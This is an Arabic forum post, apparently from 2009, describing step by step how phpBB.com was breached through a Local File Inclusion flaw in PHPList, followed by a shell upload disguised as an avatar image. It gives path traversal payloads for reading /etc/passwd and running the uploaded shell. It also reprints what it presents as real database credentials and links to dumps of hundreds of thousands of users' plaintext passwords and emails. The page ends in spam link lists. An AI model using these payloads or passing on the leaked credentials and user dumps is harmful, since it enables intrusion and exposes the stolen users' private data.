|
مساحة اعلانات نصية ذهبية |
||
اعلن هنا | اعلن هنا | اعلن هنا |
|
أدوات الموضوع | انواع عرض الموضوع |
#1
|
|||
|
|||
phpBB.com Hacked
السلام عليكم ...
بصراحة اليوم فاجئني خبر من صديق لي يقلي على إختراق موقع البرنامج الشهير www.phpBB.com حيث انه قام بإختراقها بأسهل طريقة لم تتوقع ! عن طريق برنامج الPHPlist المعروف ايضا ولاكن للاسف قبل ايام قليلة طرحت ثغره فيه بلميلورم الثغره عبارة عن Local File Inclusion Exploit حيث قام المخترق بلولوج لملف ال/etc/passwd لسيرفر البرنامج عن طريق الامر كود: http://www.phpbb.com/lists/admin/ind.../../etc/passwd والملف طبعا تم رفعه على الرايبد شير كود: http://rapidshare.com/files/192159914/etc.txt ومن ثم توجه الى ملف الاباتشي لمعرفه مسار الموقع كود: /etc/httpd/conf/httpd.conf وتم الوصول لملف الإيرر كود: /home/logs/phpbb.com/error_log ومن ثم تم معرفة مسار منتديات الphpBB كود: home/virtual/phpbb.com/community ومعروف عن منتديات الphpBB انك تستطيع حقن كود (شيل) بملف الerror log , ولو تركب منتدى phpBB بجهازك تشوف المسار يكون كدا كود: /home/virtual/phpbb.com/community/images/avatars/upload وثم تم حقن الكود (شيل) عن طريق رفع الصورة كود: (secret hash)_userid.jpg ومن ثم قام بمعرفة السيكريت كود حق الشل ( الصورة ) عن طريقة ملف الإيرر لوج الي تم إيضاحه مسبقا كود: f51ee61fe7a83fdf72780912bced0855 وبعدها يصير كل مايبي يشغل الكود ( الشيل ) بلطريقة هذه ( مثل تخطي المود سيكيورتي).. كود: /../../../../../../home/virtual/phpbb.com/community/images/avatars/upload/f51ee61fe7a83fdf72780912bced0855_ID.jpg وهذه الطريقة كان المخترق بيمتحن سيرفرهم اذا تمشي عليهم ام لا ... بحيث كان السكربت يقرا الكونفيج كود: /home/virtual/phpbb.com/community/config.php كود: $dbms = 'mysqli'; $dbhost = 'phpbb.db.osuosl.org'; $dbport = ''; $dbname = 'phpbb'; $dbuser = 'phpbb2'; $dbpasswd = 'saxM9nfRjLbJ2Yy5'; $table_prefix = 'community_'; وتم قرائة ملف الكونفيج لبرنامج الPHPLIST :dالمصيبة هذا هع هع كود: $database_host = "localhost"; $database_name = "phpbb_phplist"; $database_user = 'phplist'; $database_password = 'Berti3_Danc3'; طبعا هذه الطريقة شرحتها لكم من موقع قام بعمله على الرابط http://hackedphpbb.blogspot.com/ وبلنهاية تم سحب باسووردات الاعضاء اكثر من 200.000 الف عضو بلإضافة الى باسووردات وايميلات مشتركين بنحو 400.000 الف عضو ! والمصيبة انه باسوورداتهم كلها كلير تكست !!!! وهذه القواعد ومعلومات الأعضاء وايميلاتهم تم رفعها على الرايبد شير كود: http://rapidshare.com/files/192305758/out.txt http://rapidshare.com/files/192304153/phpbb_users.sql http://hackedphpbb.pastebin.com/f1399b3e8 http://rapidshare.com/files/192261517/backup_sql.gz وبلنهاية رسالتهم من الموقع ! كود: Maintenance We are sorry to report that we have been attacked through a vulnerability in an outdated PHPList installation. phpBB.com and related sites will remain unavailable while we work to recover. No vulnerabilities have been found in the phpBB software itself. You can download phpBB here: http://www.ohloh.net/p/phpbb You can get support at the temporary support forums or on IRC: chat.freenode.net #phpbb – the phpBB team ونتمنى من الاخوة اخذ الإختراق هذا موعظة لعدم نسيان او التهاون بوجود ملفات قديمة بلمنتدى ! حيث انه المخترق كان عضو قديم بلمنتدى وتذكر ! انه الموقع يحتوي على البرنامج المصاب ! وقام المخترق بتوضيح إختراقه للموقع حيث قال كود: -----------------------------------UPDATE to all that same i am a script kiddie, **** you phpbb, i did not alter any files on your server, everything i gained access to has been listed in this blog تحياتي ! :nice: المصـــدر |
|
|
المواضيع المتشابهه | ||||
الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
phpbb 3.0.6 آخر إصدار عربي | اشراق العالمrss | اشراق شامل - منوعات | 0 | 02-22-2009 09:22 AM |
طريقة التحويل من phpbb 2.0x الى bb4dd 2.0x | اشراق العالمrss | اشراق شامل - منوعات | 0 | 02-22-2009 09:22 AM |
عآآجل : موقع phpBB.com يتعرض لاختراق خطير يوقفه عن العمل !!! | اشراق العالمrss | القناة الإخبارية - أخبار | 0 | 02-07-2009 09:25 PM |
موقع phpBB.com يتعرض لاختراق خطير يوقفه عن العمل | اشراق العالمrss | القناة الإخبارية - أخبار | 0 | 02-06-2009 03:40 AM |
شراء روابط نصية | |
راسلنا الآن لشراء روابط نصية باك لينك وجيست بوست | خدمات الباك لينك والروابط النصية |
روابط نصية AAXA | ||||
اشتراك يوتيوب بريميوم | اشتراك تطبيقات بلس | اشتراك IPTV شهر | يوتيوب بريميوم | عسل النحل |
روابط نصية AAPS | ||||
دراما كافيه | دراما صح | اهواك Tv | فوستا | شبكتي Tv |
روابط نصية AA1A | |||||
كورة لايف | koora live | مباريات اليوم بث مباشر | kora 360 | koora4live | كورة لايف |
koora live | مباريات اليوم بث مباشر | kora 360 | koora4live | kooralive | مساحة إعلانيه |
روابط نصية AAZ | ||
متجر الرياض | شحن شدات ببجي | شحن شدات ببجي |
روابط نصية AHD3 | |||||||||
عزل اسطح | كشف تسربات المياه | عزل فوم بالرياض | شركة عزل اسطح | كشف تسربات المياه بالرياض | عزل اسطح بجدة | شركة كشف تسربات المياه | نقل اثاث بالرياض | شراء اثاث مستعمل بالرياض | شركة تنظيف بالرياض |
روابط نصية KSM | |||||||
خصومات | هدايا وكوبونات | توفير المال | مال واستثمار | صفقات وتسوق | عروض اسواق السعودية | تحسين مالي | كوبونات |
روابط نصية AN | ||||
يلا شوت | يلا شوت | يلا لايف | yalla shoot | يلا شوت |
روابط نصية M11 | |||||||
كورة جول | يلا لايف | دوت سبورت | bein match | yalla shoot | yalla shoot | koora live | koora live |
يلا شوت | koora4live | سوريا لايف | تابع لايف | كورة لايف | كورة جول | كورة لايف | koora live |
روابط نصية AWA | ||||
كورة لايف | Koora live | يلا شوت | Yalla shoot | يلا شوت |